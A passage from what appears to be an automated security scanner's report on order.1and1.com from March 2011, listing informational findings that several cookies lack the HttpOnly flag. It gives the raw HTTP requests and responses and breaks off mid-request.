Date: Sun, 20 Mar 2011 17:37:42 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 20:51:50 GMT; Path=/
ETag: 9764ec14efbf07d8da12215d59db0368
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 19469


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.159. http://order.1and1.com/xml/order/eshopupselling

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/eshopupselling

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/eshopupselling HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:47:38 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=77b06e36ce808c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/eshopupselling;jsessionid=E350E3F663E4617477BB706409508019.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.160. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupDomainPrices HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:07 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=2b1b8234745e6800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupDomainPrices;jsessionid=EECC1D398870904E1A403CED1277E5EB.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.161. http://order.1and1.com/xml/order/popupDomainPrices

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:09 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 22:02:16 GMT; Path=/
ETag: e45563522176fd4cc17107a164b81314
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20311


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.162. http://order.1and1.com/xml/order/popupGreenPower

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupGreenPower HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:56 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7e68c4801468a800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupGreenPower;jsessionid=144AB63B6FD2A635A5AAFA83DE86F409.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.163. http://order.1and1.com/xml/order/popupGreenPower

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupGreenPower

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupGreenPower;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=WZlsrLi8lTmVlX3JobzVtZzQmMGlcVi5FODIaHhsbMS8xLywsLy4oKy8iJCMiH0QyXlNVYxs0L184YnE3KisnJisnJSgmICgfHidfYD0yOWlyOCssKCcsKSYpJCcoISI=; Expires=Fri, 07-Apr-2079 21:49:52 GMT; Path=/
ETag: 2a13611a8831339ff628b2e9f7c64b09
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19325


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.164. http://order.1and1.com/xml/order/popupPayPalInfo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupPayPalInfo

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupPayPalInfo HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:04 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7a09ad3484127800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupPayPalInfo;jsessionid=B75E80D5C552A0BD8C969DE465F902C3.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.165. http://order.1and1.com/xml/order/popupServerOsCds

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsCds

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupServerOsCds HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:50:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=226ab840267c5c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsCds;jsessionid=1AF14401B4F592D397D86232610BA605.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.166. http://order.1and1.com/xml/order/popupServerOsVps

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupServerOsVps

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupServerOsVps HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:51:24 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1c33f57f30826000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupServerOsVps;jsessionid=40FA96CB67E1FCB2006929EAF3F17218.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.167. http://order.1and1.com/xml/order/popupTcGoogleAdwords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (see the Set-Cookie header in the response below; it is a persistent cookie with an Expires date in 2079). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupTcGoogleAdwords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:57 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=4a2AwMzQqU1NTTWBWdDpybDkrNW5hWzNKPTcfIyAgHx0fHRoxNDMtMDQnKSgnJEk3Y1haaCAiHU0mUHY8LzAsKzAsKi0rJS0kIyxkZSsgJ1dgPTAxLSwxLisuKSwtJic=; Expires=Fri, 07-Apr-2079 22:01:04 GMT; Path=/
ETag: 6447aa64162097c42fe1904421a3897b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17242


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.168. http://order.1and1.com/xml/order/popupTcGoogleAdwords

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupTcGoogleAdwords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupTcGoogleAdwords HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:25 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=3b642682d7bbd000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupTcGoogleAdwords;jsessionid=B2EEE577726F2FA6B3B7334798083D45.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.169. http://order.1and1.com/xml/order/popupWebsiteMagazine

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupWebsiteMagazine

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/popupWebsiteMagazine HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:35:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=7feacfa62b8fb000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/popupWebsiteMagazine;jsessionid=A452B317247532F2BF2881CCC63C5F06.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.170. http://order.1and1.com/xml/order/sitedesign

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/sitedesign

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: __PFIX_TST_ (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/sitedesign HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:34:51 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=59c0d039ad1bdc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/sitedesign;jsessionid=394148206EE1F88BBCF2781787CD33B7.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.171. http://order.1and1.com/xml/order/tariffselect

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/tariffselect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UT (see the Set-Cookie header in the response below; it is a persistent cookie with an Expires date in 2079). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-beginner-package-bundle HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
